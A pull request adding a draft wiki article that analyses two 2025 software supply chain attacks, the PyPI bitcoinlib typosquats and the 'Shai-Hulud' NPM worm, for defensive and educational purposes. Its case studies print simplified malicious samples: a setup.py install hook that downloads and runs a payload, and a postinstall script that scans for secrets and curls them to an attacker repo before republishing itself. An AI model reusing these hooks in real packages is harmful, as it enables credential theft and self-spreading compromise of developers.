### PR TITLE
New Wiki Article: The 2025 Paradigm Shift in Supply Chain Attacks

### DIFF
--- a/content/research/cyberattacks/wiki/supply-chain/index.md
+++ b/content/research/cyberattacks/wiki/supply-chain/index.md
@@ -1,0 +1,145 @@
+# [DRAFT] The 2025 Paradigm Shift: Why Private Key Leaks Outpaced Smart Contract Exploits
+
+**Article for dn-institute Crypto Attacks Wiki**
+
+## Abstract
+In 2025, the crypto security landscape witnessed a significant paradigm shift. While smart contract auditing has matured, attackers have pivoted, focusing on more vulnerable layers of the stack: the developer's toolkit and operational security. This article provides a technical analysis of two prominent supply chain attacks from 2025, demonstrating how poisoned software updates and private key mismanagement have become the primary vector for multi-million dollar losses, outpacing traditional on-chain exploits.
+
+---
+
+## 1. Introduction: The Evolving Threat Model
+
+For years, the focus of crypto security has been on-chain: auditing Solidity, formal verification, and gas optimization. However, as on-chain security practices have improved, the economic incentive for attackers has shifted. The path of least resistance is no longer the contract, but the human and the tools they use. In 2025, we saw this trend accelerate, with supply chain attacks and private key compromises accounting for over $3 billion in losses.
+
+This report will dissect two specific case studies that exemplify this new paradigm.
+
+---
+
+## 2. Case Study: The Python `bitcoinlib` Typosquatting Attack
+
+**Vector:** Software Supply Chain (Typosquatting)
+**Target:** Python developers using the `bitcoinlib` library
+
+### 2.1. Attack Analysis
+
+In mid-2025, security researchers identified malicious packages uploaded to the Python Package Index (PyPI). The attack did not compromise the legitimate `bitcoinlib` package. Instead, it relied on a classic typosquatting technique.
+
+*   **Malicious Packages:** `bitcoinlibdbfix` and `bitcoinlib-dev`
+*   **Mechanism:** Attackers assumed developers would either mistype the package name (`pip install bitcoinlib-dev`) or believe these were legitimate, auxiliary packages for database fixes or development versions.
+*   **Payload:** The `setup.py` file in these packages contained obfuscated code that executed upon installation. It scanned the user's home directory for common wallet file names (`wallet.dat`, etc.) and developer credentials (`.env` files, ssh keys) and exfiltrated them to a remote server.
+
+### 2.2. Technical Breakdown
+
+The malware's execution flow, based on analysis of similar typosquatting packages, followed a multi-stage process:
+
+1.  **Initial Compromise (`setup.py`):** The attack was initiated via the `setup.py` script. Instead of containing legitimate setup logic, it housed a small piece of code designed to download a second-stage payload from an external source, often a file-sharing site like AnonFiles.
+
+    ```python
+    # Simplified example of malicious code in setup.py
+    import subprocess
+    import requests
+
+    def get_payload():
+        url = "https://anonfiles.com/some-malicious-payload"
+        response = requests.get(url)
+        # The malware often parsed the HTML to find the real download link
+        # ... parsing logic ...
+        real_download_link = "https://..." 
+        payload_content = requests.get(real_download_link).content
+        
+        # Write payload to a temporary executable file
+        with open("/tmp/payload.exe", "wb") as f:
+            f.write(payload_content)
+        
+        # Execute the payload
+        subprocess.run(["/tmp/payload.exe"])
+
+    # Hijack the install process
+    from setuptools.command.install import install
+    class MaliciousInstall(install):
+        def run(self):
+            get_payload()
+            install.run(self)
+    
+    # ... setup config ...
+    setup(
+        # ...,
+        cmdclass={'install': MaliciousInstall}
+    )
+    ```
+
+2.  **Second-Stage Payload (Packed Executable):** The downloaded file was not the final malware but a packed executable (often created with `pyinstaller`). This executable contained the actual malicious Python script along with a Python interpreter, allowing it to run even on systems without Python installed.
+
+3.  **Data Exfiltration:** Once executed, the unpacked Python script would:
+    *   Scan the filesystem for sensitive files, prioritizing cryptocurrency wallet data (e.g., `Exodus/exodus.wallet`) and developer credentials.
+    *   Use Discord webhooks for C2 (Command and Control) communication and data exfiltration, a common technique to blend in with legitimate traffic.
+    *   Implement sandbox evasion techniques, such as checking for the presence of a debugger (`IsDebuggerPresent`), to hinder analysis.
+
+---
+
+## 3. Case Study: The NPM Credential Harvesting Worm
+
+**Vector:** Software Supply Chain (Dependency Confusion / Malicious Packages)
+**Target:** NodeJS developers and CI/CD pipelines
+
+### 3.1. Attack Analysis
+
+Throughout 2025, a series of malicious NPM packages were discovered that aimed to steal developer credentials, specifically GitHub and NPM tokens.
+
+*   **Mechanism:** These packages were often published with names similar to popular libraries or as dependencies of other compromised packages. Once installed (e.g., via `npm install`), a `postinstall` script would execute.
+*   **Payload:** The script searched for environment variables and configuration files (`.npmrc`, `.git-credentials`) containing authentication tokens.
+*   **Propagation:** The truly novel aspect was its worm-like behavior. Upon successfully stealing a GitHub token with repository write access, the malware would use the GitHub API to commit malicious code into the victim's own public repositories, thus infecting their projects and creating a new distribution vector for the malware. For example, it would query `/user/repos?affiliation=owner,collaborator` to find viable targets.
+
+### 3.2. Technical Breakdown
+
+Analysis of the "Shai-Hulud" worm, a prominent example of this attack vector, reveals a sophisticated propagation and data theft mechanism:
+
+1.  **Initial Infection (`postinstall` script):** The attack began when a developer installed a compromised NPM package. A malicious `postinstall` script, configured in the package's `package.json`, would execute automatically.
+
+2.  **Credential Scanning:** The script then used embedded tooling, such as a version of the open-source secret scanner `TruffleHog`, to aggressively scan the local environment. It searched for:
+    *   Environment variables.
+    *   Configuration files like `.npmrc` and `.git-credentials`.
+    *   Cloud credentials exposed via local metadata services (IMDS).
+
+3.  **Data Exfiltration:** Discovered secrets were exfiltrated to the attacker. A common method was to encode the stolen data (often double base64) and push it to a public GitHub repository controlled by the attacker, using a stolen GitHub token for authentication.
+
+4.  **Propagation (Worm Behavior):** This was the most critical phase. If the malware discovered an NPM token with publishing rights or a GitHub token with write access to repositories containing NPM packages, it would:
+    *   Read the `package.json` of the victim's own packages.
+    *   Inject itself as a dependency or into the `postinstall` script.
+    *   Increment the package version number.
+    *   Run `npm publish` to push the newly infected version to the public NPM registry, effectively spreading the worm to any project that depended on the compromised package.
+
+    ```javascript
+    // Conceptual example of a malicious postinstall script
+    const { execSync } = require('child_process');
+
+    try {
+      // 1. Scan for credentials
+      const secrets = execSync('trufflehog filesystem / --json').toString();
+      
+      // 2. Exfiltrate data
+      const encodedSecrets = Buffer.from(secrets).toString('base64');
+      // Use a stolen GitHub token to push secrets to a repo
+      execSync(`curl -X PUT -H "Authorization: token ${process.env.STOLEN_GITHUB_TOKEN}" -d '{"content":"${encodedSecrets}"}' https://api.github.com/repos/attacker/repo/contents/stolen_data.json`);
+
+      // 3. Propagate if valuable tokens are found
+      if (process.env.NPM_TOKEN) {
+        // Find local package.json files, inject malware, increment version, and publish
+        // ... propagation logic ...
+        execSync('npm publish');
+      }
+    } catch (e) {
+      // Fail silently
+    }
+    ```
+
+---
+
+## 4. Conclusion: The New Security Frontier
+
+The `bitcoinlib` and NPM attacks highlight a crucial lesson for 2026 and beyond: on-chain security is no longer sufficient. The new frontier is off-chain, focusing on developer-centric threats:
+*   **Dependency Hygiene:** Verifying package names and avoiding untrusted dependencies.
+*   **Credential Management:** Using hardware wallets and avoiding storing plaintext keys.
+*   **CI/CD Security:** Locking down pipeline access and scanning for malicious scripts.
+
+The economic incentives for attackers will always drive them toward the weakest link. In 2025, that link was unequivocally the software supply chain.


### PR DESCRIPTION
This pull request adds a new article to the Crypto Attacks Wiki, analyzing the rise of software supply chain attacks in 2025. It covers two case studies: a Python typosquatting attack and an NPM credential-harvesting worm. This contribution is submitted as part of the bounty program.